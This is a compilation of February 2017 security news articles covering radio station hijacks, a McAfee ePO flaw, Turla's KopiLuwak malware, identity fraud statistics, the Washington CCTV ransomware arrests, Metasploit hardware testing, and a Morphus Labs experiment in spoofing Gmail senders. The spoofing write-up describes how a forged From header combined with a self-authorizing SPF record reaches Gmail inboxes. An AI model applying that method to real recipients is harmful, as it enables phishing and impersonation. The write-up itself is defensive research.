Radio Stations Hacked to Play "F**k Donald Trump" on Repeat Across the Country
3.2.2017 thehackernews Hacking
It’s just two weeks into the Trump presidency, but his decisions have caused utter chaos around the country.
One such order signed by the president was banning both refugees and visa holders from seven Muslim-majority countries (Iraq, Iran, Libya, Yemen, Somalia, Syria, and Sudan) from entering the United States, resulting in unexpectedly arrest of some travelers at airports.
Now, it seems like some anti-Trump protesters have publically declared their fight against the president by exploiting a known flaw in low power FM (LPFM) radio transmitters to play a song the radio stations didn't intend to broadcast.
Radio stations in South Carolina, Indiana, Texas, Tennessee and Kentucky, were hacked recently to broadcast the Bompton-based rapper YG and Nipsey Hussle's anti-Trump song "Fuck Donald Trump," which was already a radio hit in some parts of the country last year, several sources report.
The song was repeatedly played on Monday night, according to the RadioInsight, and the news of the incident began emerging shortly after Trump's inauguration on January 20, eight days before hackers hacked 70 percent of the police CCTV cameras in Washington DC.
Hackers gained access to the radio stations by exploiting known vulnerabilities in Barix Exstreamer devices which can decode audio file formats and send them along for LPFM transmission.
Over a dozen radio stations experienced the hack in recent weeks, though some of them shut down their airwaves as quickly as possible in an attempt to avoid playing the inflammatory "FDT (Fuck Donald Trump)" song on loop.
The hackers or group of hackers behind the cyber attack is still unknown. The affected stations so far include:
105.9 WFBS-LP Salem, S.C.
Radio 810 WMGC/96.7 W244CW Murfreesboro TN
101.9 Pirate Seattle
100.9 WCHQ-LP Louisville
100.5 KCGF-LP San Angelo TX
However, there are unconfirmed reports from radio stations in California, Indiana, and Washington State that are believed to be affected as well.
Has any of the radio stations you listen to been hit by the hackers? Let us know in the comments!
Critical McAfee ePO Flaw Ideal For Reconnaissance
3.2.2017 securityweek Vulnerebility
Intel Security has fixed a critical vulnerability in its McAfee ePolicy Orchestrator (ePO) centralized security management product. Researchers warn that the flaw is ideal for profiling the users and infrastructure of an organization.
The flaw, tracked as CVE-2016-8027 and assigned a CVSS score of 10.0, is a blind SQL injection discovered by a member of the Cisco Talos Vulnerability Development Team. The security hole can be triggered using specially crafted HTTP POST requests and it allows an unauthenticated attacker to obtain information from the application database.
McAfee ePO allows organizations to manage their security policies from a central console. The solution requires the deployment of agents on each endpoint, and these agents communicate over a proprietary protocol known as SPIPE.
The vulnerable component is in the application server and it can be reached directly via the administration console or over SPIPE. Researchers warned that exploitation of the flaw can also allow attackers to impersonate an agent, which can reveal information related to that agent.
“Vulnerabilities like this can allow deep insight into the organisation without an attacker requiring any privileged access to centralised platforms such as Active Directory, with this access an attacker can profile users and the infrastructure passively,” Talos researchers said in a blog post.
The security hole affects McAfee ePO version 5.1.3 and earlier, and 5.3.2 and earlier. Intel Security has released hotfixes to address the vulnerability. While the vendor says there are no mitigations or workarounds, Talos believes attacks can be prevented by limiting access to port 8443.
Cisco has published technical details on the vulnerability and Intel Security has released an advisory with information on affected versions and patches.
It’s not uncommon for researchers to find vulnerabilities in enterprise security products. Serious flaws have also been identified in solutions from Symantec, FireEye, Kaspersky, Sophos and several other vendors.
Russia-Linked "Turla" Group Uses New JavaScript Malware
3.2.2017 securityweek Virus
The Russia-linked cyber espionage group known as Turla has been using a new piece of JavaScript malware to profile victims, Kaspersky Lab reported on Thursday.
Turla, an advanced persistent threat (APT) actor that has been active since at least 2007, is believed to be responsible for several high-profile attacks, including the ones aimed at Swiss defense firm RUAG and the U.S. Central Command. The group is also known as Waterbug, Venomous Bear and KRYPTON, and some of its primary tools are tracked as Turla (Snake and Uroburos), Epic Turla (Wipbot and Tavdig) and Gloog Turla.
The cyberspies have been mainly interested in organizations located in Europe and the United States. Recent attacks observed by researchers at Kaspersky Lab appear to have targeted organizations in Greece, Qatar and Romania.
In a report sent out to customers in June 2016, Kaspersky revealed that Turla had started using Icedcoffee, a JavaScript payload delivered via macro-enabled Office documents. In late November, the security firm spotted a new JavaScript payload designed mainly to avoid detection. Microsoft researchers have also been monitoring the threat.
The new malware, dubbed KopiLuwak, has been delivered to at least one victim using a document containing an official letter from the Qatar Embassy in Cyprus to the Ministry of Foreign Affairs in Cyprus. Since the document appears to have been sent by the Qatar ambassador’s secretary, experts believe the attackers may have breached the diplomatic organization’s network.
The final KopiLuwak payload is hidden under several JavaScript layers. Once it becomes persistent by creating a registry key, the malware executes a series of commands in an effort to collect information about the infected system. The harvested data is stored in a temporary file that is deleted after it’s encrypted and stored in memory.
KopiLuwak then attempts to contact its command and control (C&C) servers. These are compromised websites whose address has been hardcoded into the malware.
The C&C can instruct the malware to sleep, exit and terminate C&C communications until the next reboot, uninstall itself, and run arbitrary commands on the infected system using Wscript.shell.run().
One of the C&C domains had expired, allowing Kaspersky to acquire it and use it as a sinkhole. Several systems connected to this domain, but the most interesting IP was one associated with the Greek Parliament.
For the time being, Kaspersky says KopiLuwak is less popular than Icedcoffee, but the company believes the new malware will be used more in the future as a first-stage delivery mechanism and victim profiler.
“Currently, it seems the Turla actors continue to rely heavily on embedded macros in Office documents,” explained Kaspersky’s Brian Bartholomew. “While this may appear to be an elementary technique to use for such a sophisticated actor, they are repeatedly successful in compromising high value targets with this method.”
Security Intelligence Automation Startup LogicHub Emerges from Stealth
3.2.2017 securityweek Security
Machine learning and artificial intelligence seem to be the way forward in cyber security; nearly all new companies and products boast that capability. But one new company, emerging from stealth on Wednesday, is a little different. Most current security systems seek to automate knowledge; this one seeks to automate intelligence -- the 'how' over and above the 'what'.
LogicHub announced its arrival with news of an $8.4 million Series A funding round led by Storm Ventures and Nexus Venture Partners. Its purpose is to build a new type of threat detection system based on human security intelligence rather than simply big data analysis. This is based on one primary observation: a top grade human analyst is better at detecting threats than the current generation of threat detection systems.
"We have done what we call cyberhunt challenges with 75 companies," CEO and co-founder Kumar Saurabh told SecurityWeek. "We provided a volume of data containing a threat, and asked each company if its automated system would find it. In only two out of the 75 challenges did the organization say its systems had more than a 50% chance of doing so. But they also said their in-house expert analyst would find it with 90+% confidence."
But when he next asked if they could find the threat in two minutes, the response was resounding: it would take more like two hours. "This is what I hear again and again," he said: "the systems are not clever enough, and the analysts are not fast enough." His solution is to develop a system that can combine the intelligence of analysts with the speed of machines.
"At the end of the day," says Saurabh, "experienced cyber analysts are much better at detecting threats and triaging false alarms than the security tools available, but given the magnitude of the challenge, most teams can only inspect a tiny fraction of all security events collected in-depth. To combat this, LogicHub has found a way to capture and automate the knowledge and expertise of the most skilled cyber analysts, which results in much deeper threat detection."
This is the conundrum that LogicHub has set itself to solve: automating the human expert analyst's threat hunting process rather than just generating and maintaining more and more rules on recognizing known threat indicators. By capturing expertise into a security intelligence 'brain', that expertise can then be used by lower grade analysts in the future. Furthermore, if the expert analyst is tempted away by a higher salary elsewhere, his or her expertise does not entirely leave at the same time.
It requires a different type of architecture, and Saurabh points to Google Search as an example. It is fast, clever, and able to 'predict' user requirements. "One of the key things Google did a couple of years ago," he explained, "was they built a knowledge graph. And that knowledge graph has tens of millions of entities and relationships. They use that knowledge graph to link entities by relationships so that it understands the data it contains."
In fact, in October 2016, City University of New York professor Jeff Jarvis tweeted, "Google knowledge graph has more than 70 billion facts about people, places, things. + language, image, voice translation."
"The difference between Knowledge Graph and the security solutions available today is that they don't understand the data," said Saurabh. "They do nothing to tell the user how to navigate the data." It's like the difference between modern GPS and a road atlas, he continued. "With the atlas, you have the data, but you have to figure out what that data means by yourself."
In threat analysis, there are very few people who really understand what the data means. "Since that understanding is trapped in their heads, it can only be leveraged in a very limited way. With automation, we can take the expertise that is trapped in their heads and turn it into a system so that what one analyst knows and applies can be shared with ten other people on the security team. Over time you can build a system that is more available as a service, and can be used by hundreds of companies -- it becomes a security brain."
Developing that security brain is what LogicHub is doing. It has an augmentation tool that automates that capture of analyst methods, so that different analytical method from different analysts can be combined into the intelligence automation tool. "A security analyst with our security intelligence automation platform can become equal to ten analysts. You have to use the augmentation tool to get there; but it has that potential."
This system will be offered as an on-premise solution for those companies not yet comfortable with the cloud and sharing data, and as a cloud service that combines and shares analytical expertise with all cloud customers.
Identity Fraud Hit 15.4 Million U.S. Victims in 2016: Report
3.2.2017 securityweek Crime
In 2016, 15.4 million U.S. consumers became identity fraud victims, a 16% increase over the previous year, according to a recent Javelin Strategy & Research study.
Despite increased efforts from the industry to tackle identity fraud, cybercriminals managed to net two million more victims in the last year, with the incurring damages going up by $1 billion to reach $16 billion, Javelin Strategy & Research’s 2017 Identity Fraud Study shows. The suffered losses are in line with those reported two years ago.
Payment card fraud experienced a resurgence in 2016, with card-not-present (CNP) registering an increase of 40%. As the report explains, “the increase in EMV cards and terminals was a catalyst for driving fraudsters to shift to fraudulently opening new accounts.” The research also claims that, although crooks are becoming better at evading detection, consumers with an online presence are detecting fraud quicker.
Fraud trends, however, are worrying, especially with 6.15% of consumers becoming victims of identity fraud in 2016. Compared to the previous year, almost 2 million more people fell victim, mainly fueled by a spike in existing card fraud, the report shows.
While the level point-of-sale (POS) fraud remained almost unchanged compared to 2014 and 2015 levels, account takeovers (ATO) and losses rose notably in 2016. ATO losses registered a 61% increase compared to the previous year, reaching $2.3 billion, while incidence went up 31%.
According to the research and consulting firm, account takeover remains one of the most challenging fraud types for consumers. Victims, the company says, pay an average of $263 out of pocket costs to resolve an incident. The total hours spent to solve this type of fraud was 20.7 million in 2016, a 6 million hour increase over 2015.
The study also says that fraudsters have become much better at avoiding detection, with new-account fraud (NAF) victims being notably more likely to discover fraud through review of their credit report (15%) or when they were contacted by a debt collector (13%).
The annual Identity Fraud Study has surveyed 69,000 respondents since 2003, and identified and analyzed four consumer personas for this year: Offline Consumers, Social Networkers, e-Commerce Shoppers and Digitally Connected.
Because they have little online presence, Offline Consumers are exposed to less fraud risks, but they incur higher fraud amounts than other fraud victims and need more than 40 days to detect fraud. Because they share their social life on digital platforms but have little presence on e- or m-commerce sites, Social Networkers face a 46% higher risk of account takeover fraud.
E-commerce buyers (including mobile shoppers) expose their financial information and are at risk of existing card fraud. However, 78% of them detect fraud within one week of it beginning, thus minimizing losses. As for the Digitally Connected Consumer category, it includes people that have extensive social network activity, shop online frequently, and adopt new digital technologies fast. They face a 30% higher risk to be a fraud victim.
“After five years of relatively small growth or even decreases in fraud, this year’s findings drives home that fraudsters never rest and when one areas is closed, they adapt and find new approaches. The rise of information available via data breaches is particularly troublesome for the industry and a boon for fraudsters. To successfully fight fraudsters, the industry needs to close security gaps and continue to improve and consumers must be proactive too,” Al Pascual, senior vice president, research director and head of fraud & security, Javelin Strategy & Research, said.
The 2017 ID Fraud survey was conducted among 5,028 U.S. adults over age 18 on KnowledgePanel, the company said. The sample is believed to be representative of the U.S. census demographics distribution, recruited from the Knowledge Networks panel. The data was collected between Nov 5 and Nov 21, 2016.
České uživatele stále častěji ohrožují škodící downloadery
3.2.2017 SecurityWorld Viry
I když dominance malwaru Danger skončila, nahradily jej další nebezpečené stahovače škodlivého kódu.
Naprostá převaha škodlivého kódu Danger nad všemi ostatními internetovými hrozbami v Česku prozatím pominula.
V lednu sice tento malware nadále představoval nejčetněji detekovanou hrozbu, nicméně jeho podíl klesl o více než 30 procentních bodů na 11,05 procenta. Naopak posilovaly jiné typy škodlivých kódů, jak vyplývá ze statistiky společnosti Eset.
„Pokles podílu downloaderu Danger je opravdu významný. V prosinci představoval téměř každou druhou zaznamenanou hrozbu, v lednu jen každou desátou. Zjistili jsme však významný nárůst výskytu různých typů malware rodiny TrojanDownloader,“ říká Miroslav Dvořák, technický ředitel Esetu.
Podle něj jde stejně jako v případě Dangeru o kód snažící do napadeného zařízení nahrát další škodlivé kódy.
Druhou nejčetnější lednovou hrozbou v Česku byl zástupce výše uvedené rodiny, konkrétně pak VBA/TrojanDownloader.Agent.CHO, který představoval 5,03 procenta zachycených případů.
Na třetí pozici se dostal malware Changer, který Eset detekuje jako JS/ProxyChanger. Tento škodlivý kód umožňuje přesměrovat legitimní požadavek na útočníkem nastrčenou stránku a získat tak například číslo kreditní karty oběti. Changer stál za 4,36 procenty případů zjištěných internetových útoků v Česku.
Top 10 hrozeb v České republice za leden 2017:
1. JS/Danger.ScriptAttachment (11,05 %)
2. VBA/TrojanDownloader.Agent.CHO (5,03 %)
3. JS/ProxyChanger (4,36 %)
4. JS/TrojanDownloader.Nemucod (4,12 %)
5. JS/Kryptik.RE (3,38 %)
6. VBA/TrojanDownloader.Agent.CIY (2,55 %)
7. VBA/TrojanDownloader.Agent.CIQ (2,04 %)
8. Java/Adwind (2,01 %)
9. JS/TrojanDownloader.Iframe (1,73 %)
10. PowerShell/TrojanDownloader.Agent.DV (1,58 %)
Zdroj: Eset, únor 2017
Nová centra v Česku i na Slovensku
Eset rovněž zahájil provoz nových center zaměřených na výzkum a vývoj -- tyto pobočky vznikají v Brně a slovenské Žilině.
„Centrum v Brně jsme vybrali kvůli geografické blízkosti k bratislavské centrále, tamnímu zázemí technologických univerzit a samozřejmě i IT talentům, kteří jsou v tomto regionu k dispozici,“ říká technologický ředitel společnosti Eset Juraj Malcho.
V případě západoslovenské Žiliny půjde o třetí pracoviště společnosti na Slovensku. Vedle centrály v Bratislavě už Eset má vývojové centrum v Košicích, které se zaměřuje především na antispamové technologie. Oproti tomu specialisté z pobočky v Žilině budou spolupracovat na vývoji firemních produktů Esetu.
Two Arrested for Hacking Washington CCTV Cameras Before Trump Inauguration
3.2.2017 thehackernews Hacking
Two Arrested in London for Hacking Washington CCTV Cameras Before Trump Inauguration
Two suspected hackers have reportedly been arrested in London on suspicion of hacking 70 percent of the CCTV cameras in Washington with ransomware ahead of President Donald Trump's inauguration last month.
The arrest took place on 20th January by the officers from the National Crime Agency (NCA) of UK after it received a request from United States authorities, but it has not been disclosed until now.
The NCA raided a house in the south of London last month and detained a British man and a Swedish woman, both 50-years-old, reported The Sun.
Some 123 of the 187 police CCTV cameras used to monitor public areas in Washington DC stopped working on 12 January, just 8 days before the inauguration of Donald Trump, after a cyber attack hit the storage devices.
The cyber attack lasted for about three days, eventually leaving the CCTV cameras out of recording anything between 12 and 15 January.
It was reported that the surveillance cameras were left useless after a ransomware made its way onto the storage devices that records feds data from CCTV cameras across the city. The hackers demanded ransom money, but the Washington DC Police rejected their demand.
Ransomware is an infamous piece of malware that has been known for locking up computer files and then demanding a ransom in Bitcoins in order to help victims unlock their files.
However, instead of fulfilling ransom demands of hackers, the DC police took the storage devices offline, removed the infection and rebooted the systems across the city.
The storage devices were successfully put back to rights, and the surveillance cameras were back to work. According to authorities, no valuable data was lost, and the ransomware infection merely crippled the affected computer network devices.
The "officers executed a search warrant at an address in Natal Road, SW16, on the evening of Thursday 19 January. A man and a woman were arrested and later bailed until April 2017," according to the NCA.
The intention of these two 50-year-old suspects is still unclear.
Popular hacking toolkit Metasploit adds hardware testing capabilities
3.2.2017 securityaffeirs Hacking
The Metasploit hacking toolkit now includes a new hardware bridge that makes it easier for users to analyze hardware devices.
The popular offensive hacking toolkit Metasploit now is powerful, it included a hardware bridge to conduct security tests on hardware. It is a great support to the users that have to test hardware, including IoT devices.
Metasploit already includes more than 1,600 exploits and 3,300 modules, with a huge hacking community that works on news modules and scripts.
Up until now, the Metasploit allowed the creation of custom scripts for hardware testing, now the update to the Hardware Bridge API will allow users to test a variety of hardware including vehicles’ CAN buses.
The new Hardware Bridge API gives a precious instrument to customers focused on the development of hardware exploits.
The first update to the Hardware Bridge API focuses is specifically designed for the testing of automotive systems, Rapid7 that manages the tool will soon add other modules to extend the capabilities of its product.
Metasploit aim to be an institutional tool for a wide range of hardware platforms, including SCADA and industrial control systems (ICS), IoT systems, and software defined radio (SDR). The company believes the new capability makes Metasploit an ideal tool for conducting hardware-based network research.
“Metasploit condensed a slew of independent software exploits and tools into one framework and now we want to do the same for hardware,”
“Every wave of connected devices – regardless of whether you’re talking about cars or refrigerators – blurs the line between hardware and software. As we like to say, this hardware bridge lets you exit the Matrix and directly affect real, physical things,” explained Craig Smith, director of transportation research at Rapid7. “We’re working to give security professionals the resources they need to test and ensure the safety of their products — no matter what side of the virtual divide they’re on.”
“Much in the same way that the Metasploit framework helped unify tools and exploits for networks and software, the Hardware Bridge looks to do the same for all types of hardware.”
Russian cyber espionage group Turla leverages on a new JavaScript Malware
3.2.2017 securityaffeirs Virus
The Russia-linked cyber espionage group known as Turla has been using a new piece of JavaScript malware to profile victims, Kaspersky Lab reported on Thursday.
Turla is the name of a Russian cyber espionage ATP group (also known as Waterbug, Venomous Bear and KRYPTON) that has been active since at least 2007 targeting government organizations and private businesses.
The list of victims is long and includes also the Swiss defense firm RUAG and the US Central Command.
The Turla’s arsenal is composed of sophisticated hacking tools and malware tracked as Turla (Snake and Uroburos rootkit), Epic Turla (Wipbot and Tavdig) and Gloog Turla. In June 2016, researchers from Kaspersky reported that the Turla APT had started using Icedcoffee, a JavaScript payload delivered via macro-enabled Office documents.
Now experts at Kaspersky Lab have discovered a new piece of JavaScript malware linked to the dreaded group, the last string of attacks targeted organizations in Greece, Qatar, and Romania.
In November both Kaspersky Lab and Microsoft discovered a new JavaScript payload designed mainly to avoid detection.
View image on TwitterView image on TwitterView image on TwitterView image on Twitter
Follow
John Lambert @JohnLaTwC
Qatar #malware DOC extracts payload by regex and drops a very interesting .JS backdoor #DFIR https://pastebin.com/2Wb3hH2S
4:55 PM - 28 Jan 2017
145 145 Retweets 177 177 likes
The new JavaScript malware dubbed KopiLuwak has been delivered to at least one victim leveraging a document containing an official letter from the Qatar Embassy in Cyprus to the Ministry of Foreign Affairs in Cyprus.
The malicious document has been sent by the Qatar ambassador’s secretary, researchers from Kaspersky speculate the cyber spies may have breached the diplomatic organization’s network.
“Based on the name of the document (National Day Reception (Dina Mersine Bosio Ambassador’s Secretary).doc, it is presumed it may have been sent from the Qatar Ambassador’s secretary to the MoFA, possibly indicating Turla already had control of at least one system within Qatar’s diplomatic network.” states the report published by Kaspersky.
Malware researchers discovered that author of the KopiLuwak used multiple JavaScript layers to avoid detection, the malicious code gain persistence on the targeted machine by creating a registry key. Once infected a system, the malicious code is able executes a series of commands to collect information and exfiltrate data. Stolen data are temporarily stored in a file that is deleted after it’s encrypted and stored in memory.
The KopiLuwak JavaScript malware is controlled through a collection of compromised websites, the IP address of those websites are hardcoded into the malicious code.
“The malware is fairly simplistic but flexible in its functionality, running a standard batch of profiling commands on the victim and also allowing the actors to run arbitrary commands via Wscript.” continues the analysis.
The C&C can send arbitrary commands to the infected system using Wscript.shell.run().
Kaspersky has analyzed the malware by using the “sinkholing technique,” the researchers used as a sinkhole one of the C&C domains that had expired. In this way, the experts were able to analyze the traffic from infected systems that were contacting the C&C infrastructure. With this technique, the experts discovered that one of the victims used an IP address associated with the Greek Parliament.
Researchers from Kaspersky believe that KopiLuwak malware will be used more in the future.
“Currently, it seems the Turla actors continue to rely heavily on embedded macros in Office documents,” explained Kaspersky’s Brian Bartholomew. “While this may appear to be an elementary technique to use for such a sophisticated actor, they are repeatedly successful in compromising high value targets with this method.”
The Turla APT group continues to leverage on embedded macros in Office documents, an elementary technique that anyway allowed it to compromise high-value targets.
How much trust do you put into your Gmail inbox messages?
3.2.2017 securityaffeirs Security
Given the high trust we have on Gmail we tend to believe that all messages that fall into our inbox are legit and safe, but there is something to know …
1. Introduction
Taking good care of e-mail messages is certainly among the first recommendations of any information security policy and user awareness program. The involved risks range from SPAM to Spear Phishing attacks, generally aimed to steal information or infect the victim’s computer. Most malicious messages are filtered by anti-“everything” engines before ever being delivered to the user’s mailbox, although some bypass those filters and require the user’s perspicacity to be detected.
Generally, our trust on the technology security filters is proportional to the reputation of the service provider. The higher our belief on the provider, the lower tends to be our attention to the risks. Given the high trust we have on Gmail we tend to believe that all messages that fall into our inbox are legit and safe.
It turns out that, based on our findings this week at Morphus Labs, this “trust” logic should be revisited. We realized that a message that appears in your Gmail inbox folder even with an important sign, coming from one of your Gmail contacts with no spoof or security alert, may have been forged and impersonated by a fraudster or a cybercriminal. As few people may be aware of this possibility, we decided to shed light on this problem with this article.
This document is divided into four parts. First, it presents a contextualization on e-mail spoofing. Then, it passes through to our e-mail spoofing experiment scenarios involving Gmail and Yahoo. Next, it presents an extra Gmail behavior and finally, it presents advices on how users could identify Gmail spoofed messages and final words.
2. E-mail Spoofing
In this section, we will pass through some SMTP concepts and how e-mail sender spoofing occurs. If you are familiar with those concepts, you can skip to the next section.
The Simple Mail Transfer Protocol (SMTP) is the standard protocol used for email transmission over the Internet. Considering the technology evolution rate and today’s security requirements, we may say that this protocol is, at least, anachronistic. Its first version was defined in 1982 by the RFC 821 [1] and has not evolved much since – mainly in security aspects.
As stated in the previous paragraph, the SMTP protocol defines the message transport, not the message content. It defines, therefore, the mail envelop and its parameters, such as the message sender and recipient. The message content (body) and headers are defined by the standard STD 11 (RFC 5322) [2].
Basically, a SMTP transaction consists of three commands:
Mail From: establish the message return address in case of delivery failure;
Rcpt to: establish the message recipient. In case of multiple recipients, this command may be repeated for each one;
Data: this command sign the SMTP server to receive the content of the message which consists of the message headers and body.
To make it clear, let’s look at a very basic sample of a SMTP transaction in the Figure 1.
Figure 1: Simple SMTP transaction sample
Note that the directive “From:” is part of the message content and is normally equivalent to the value used in the SMTP command “mail from:”, but not necessarily. Its value can be freely specified by the system or person issuing commands to the SMTP server. Using the same sample, but now spoofing the message sender, it would be enough to change the “From: “ to the desired value, as seen in Figure 2.
Figure 2: A sample SMTP transaction with a spoofed sender
In this case, the message delivered to recipient@domain.com will look like it has been sent by SpoofedSender@anydomain.com rather than sender@domain.com. This open space for message impersonation or sender spoofing. And this is exactly the way it is done by cybercriminals or fraudsters to trick its victims to click on malicious links, for example.
Note that by using this kind of impersonation, if the recipient replies the message, it will be delivered to the spoofed address. For the example above, it would be delivered to SpoofedSener@anydomain.com.
It turns out that changing the “From:” to the desired value will almost certainly trig the recipient’s mail server anti-spam or anti-phishing to reject or quarantine the sent. If the message bypasses those filters, it will depend on the recipient to detect that the message was forged by analyzing the message headers.
Trying to avoid those filters, some spammers configure ad-hoc mail servers in a way to send spoofed messages on behalf of a certain domain by changing the “Mail from:” SMTP command and “From:” header to the desired value. This spoof strategy can be combated by the owners of the Internet domain by applying spoofing protection mechanisms, like SPF (Sender Policy Framework), DKIM (DomainKeys Identified Mail) and DMARC (Domain Message Authentication Reporting & Conformance). By using SPF, for example, you can specify the IP addresses of the mail servers that are allowed to send e-mail messages on behalf of your domain. Once this policy is stablished, it will be up to the recipient’s mail server to check the policy and reject messages coming from non-authorized servers.
3. Experiments
After some basic concepts on SMTP protocol and how e-mail spoofing occurs, it’s time to check the resilience of Gmail and Yahoo against mail spoofing. We are going impersonate the “From:“ message header value. The “Mail from:” SMTP command will be issued using an address of a generic domain owned by us.
For the experiments, we created a very simple scenario:
For the source of the spoofed messages, we used a generic “.com” domain owned by us and registered roughly a year ago that has not been used to host content nor to send e-mail;
For the mail server, we hired and configured a Linux server at Amazon EC2 with minimum resources running a Postfix default installation with the address *.*.123.26;
The accounts in Gmail and Yahoo we are going to use as recipients and senders of the spoofed messages were created for the experiments. They are: temporaryrecipient@gmail.com, temporaryrecipient@yahoo.com, temporarysender@gmail.com and temporarysender@yahoo.com.;
All the tests were done by connecting directly to our SMTP server (port 25) and issuing SMTP commands manually to make it easy to collect the evidence to this report.
Let’s get started.
3.1. Trying to spoof without SPF
In this experiment, we are going to try this scenario:
Try to impersonate Gmail and Yahoo accounts sending spoofed messages to the respective provider’s recipients. I.e.: temporarysender@gmail.com to temporaryrecipient@gmail.com and temporarysender@yahoo.com to temporaryrecipient@yahoo.com.
The SMTP server’s IP address is not allowed in SPF policy of our generic “.com” domain to send e-mails on behalf of it, as seen on Figure 3.
Figure 3: No SPF policy associated to the experiment domain
3.1.1. Trying to spoof a Gmail to Gmail message
This experiment itself consisted in sending an e-mail message to temporaryrecipient@gmail.com pretending to be from temporarysender@gmail.com. It is to be observed that email@our-generic-domain.com was set as the “Mail from:” SMTP parameter while the “From:” header was set to the forged value temporarysender@gmail.com, as seen in Figure 4.
Figure 4 – Trying to spoof Gmail to Gmail message with no SPF policy
As the result of this experiment (Figure 5), the Gmail servers rejected our spoofed message (ID: 7A14D2452C) with the error code 421-4.7.0 followed by the message “To protect our users from spam, mail sent from your IP address has been temporarily rate limited.” We can also see the error 421-4.7.0 and the message “Our system has detected that this message is suspicious due to the very low reputation of the sending IP address.”.
Figure 5 – Gmail servers rejecting the spoofed message
3.1.2. Trying to spoof a Yahoo to Yahoo message
Now, let’s see what happened in the Yahoo spoofing scenario. Similarly to Gmail scenario, we tried to send a message to temporaryrecipient@yahoo.com pretending it to be from temporarysender@yahoo.com, as seen in Figure 6.
Figure 6 – Trying to spoof Gmail to Gmail message with no SPF policy
As the result for this experiment, we verified that our Postfix mail server couldn’t deliver the message (ID 4259245CE). The error 421-4.7.0 followed by the message “suspicious due to the very low reputation of the sending IP address” was triggered as seen in Figure 7.
Figure 7: Mail rejected by Yahoo servers during the spoofed message delivery
3.2. Trying to spoof with SPF
In this experiment, we are going to try this scenario:
Try to impersonate Gmail and Yahoo accounts sending spoofed messages to the respective provider’s recipients. The same as the previous experiment.
Configure our domain’s SPF policy to allow our SMTP server to pass e-mail on behalf of it, as seen in the Figure 8. Our intention is to verify if this configuration, besides being a kind of self-authorization, could interfere in the Gmail and Yahoo anti-spoofing filters.
Figure 8: SPF policy allowing our SMTP Server
3.2.1. Trying to spoof a Gmail to Gmail message
As the previous experiment, we try to send an e-mail message to temporaryrecipient@gmail.com pretending to be from temporarysender@gmail.com. In the Figure 9, you can see the commands issued to our SMTP server in order to send the spoofed message.
Figure 9: Spoofing Gmail to Gmail with SPF policy allowing our SMTP server
In Figure 10, you can see the logs from our SMTP server while delivering the message (ID EBE852452C) to Gmail servers.
Figure 10 – SMTP logs
Unlike what happened when the SPF policy wasn’t authorizing our SMTP server, this time Gmail servers accepted our message delivery. Remains to know if the message was tagged as SPAM or something like that. To our surprise, the message was delivered to the recipient’s inbox folder, as seen in Figure 11. We got really surprised about that.
Figure 11 – Spoofed message in the recipient’s inbox folder
As you can see in Figure 12, by opening the message, the only detail that may draw the user’s attention to a suspicious “non-Gmail” message is the “via our-generic-domain.com” near the sender’s address. As it’s not an alert and it doesn’t have any warn sign, users may not pay enough attention to this detail and believe the message is legit. It’s important to note that if the user receives this message on iOS mobile app, this detail does not even appears as shown in Figure 13. The Gmail app for Android offers user the option to see the security details of the message.
Figure 12 – Spoofed message in the Gmail Web app
Figure 13 – The spoofed message seen from the Gmail iPhone mobile app
By observing the message headers, in Figure 14, we can see that the SPF check PASS and besides the unsuccessful DMARC check, the e-mail was properly delivered to the inbox folder of the recipient. Technically speaking, the DMARC test depends on SPF and DKIM tests. If both tests return Ok, DMARC will PASS. [3]
Similarly to SPF, DMARC is a configuration done at DNS zone level that informs what the recipient’s e-mail server should do with a message that does not comply to its policy. If it should be “rejected” to drop the message, “quarantine” to isolate the message or “none” if you want to inform that the message should be delivered.
Figure 15: Spoofing Yahoo to Yahoo with SPF polity SMTP transaction
Unlike Gmail, Yahoo rejected our spoofed message during the SMTP transaction with the error 554 5.7.9 followed by the message “Message not accepted for policy reasons.”. It is not clear, but the message was probably blocked because of the @yahoo.com e-mail address in “From:” message header sent from a non-Yahoo server.
Figure 16 – Spoofed message rejected by Yahoo servers
3.3. Trying to spoof message between corporative domains hosted by Google Apps
Given we had success spoofing messages between @gmail.com accounts, we became curious if the same strategy would work for corporative domains hosted by Google. For this scenario we had help from two companies that host their e-mails with Google and tried to send a spoofed message between user accounts.
The same steps from section 3.2.1 (spoofing Gmail to Gmail with SPF) were used. The results in this more sensitive scenario showed us concerning results. Not only the message was delivered without security warnings to the recipient’s inbox folder, but also the spoofed account profile picture.
3.4. Extra findings
During our experiments, we’ve found a curious scenario in which Gmail detects the spoofed message. It happened when we tried to spoof an address that apparently does not exists on Gmail user base.
In this situation, unlike the successful scenarios, Gmail forwarded the message to Spam folder and adds a special security alert informing that they could not verify if the message was really sent by gmail.com, as seen in Figure 17.
Figure 17 – Behavior when the spoofed sender is a non-existing Gmail account
Take a look at the same message at the Gmail app for iOS on Figure 18. Beyond the alert, it shows a fish hook icon as an allusion to a phishing attack.
Figure 18 – Spoofed message on Google mobile app for iOS
Another interesting finding is related the spoofed email avatar. Google loads the real spoofed email associated profile image, which increases the legitimacy perception by the message recipient, as seem in the Figure below.
Figure 19 – Spoofed sender profile picture
4. How to identify Gmail spoofed messages
Given the spoofed message is delivered to your inbox, without security warning, may have been flagged as important, shows the picture associated with the spoofed email and may not show that the message was sent through a non-google server, what can an user do to protect itself?
In this section, we give advices on how users may identify Gmail spoofed messages and avoid risks.
4.1. Examine message details on Gmail
Be aware of messages in your inbox coming from “@gmail.com” via another servers or domains. Normally, @gmail.com messages are delivered directly from the Gmail servers. Unfortunately, the “via” tag is available only in Gmail Web Application. In the mobile (Android and iOS) apps this information is not present making it harder to identify fake messages.
Additionally, you may take a look at the message details. This feature is available at Gmail Web application by clicking on the “down-arrow” near “to me”, as in Figure 20
Figure 20 – Examining message details
4.2. Examine message source
By examining the message details, you may notice the first signs of a spoofed message, but, only by examining the full message headers you can make sure about that.
You can access the message source by clicking on the drop down button near the “reply” button on Gmail Web application and choosing the “Show original” option as seen in the Figure 21.
Figure 21 – Opening message source/original
Note that the value of the field “Return-Path” in the message headers is an address of a non-Gmail domain. The value in this field is exactly the same used in the “Mail from: “ SMTP command when we forged this message.
So, suspect Gmail messages you receive with improper address on this field, as seen in Figure 22.
Figure 22 – Observing the message source
It is worth noting that, as Gmail marks messages with the “via” tag, obviously there are situations in which the message was sent by another mail server and yet is legit. Thus, not all messages marked with the “via” tag are malicious.
4.3. Report malicious or spam messages to Gmail
Finally, as you identify malicious or spoofed messages, report it to Gmail. By doing this, you will help Gmail improve its message filters. The report spam/phishing functions are available on the drop down button near the “reply” button on the Gmail Web application.
5. Final considerations
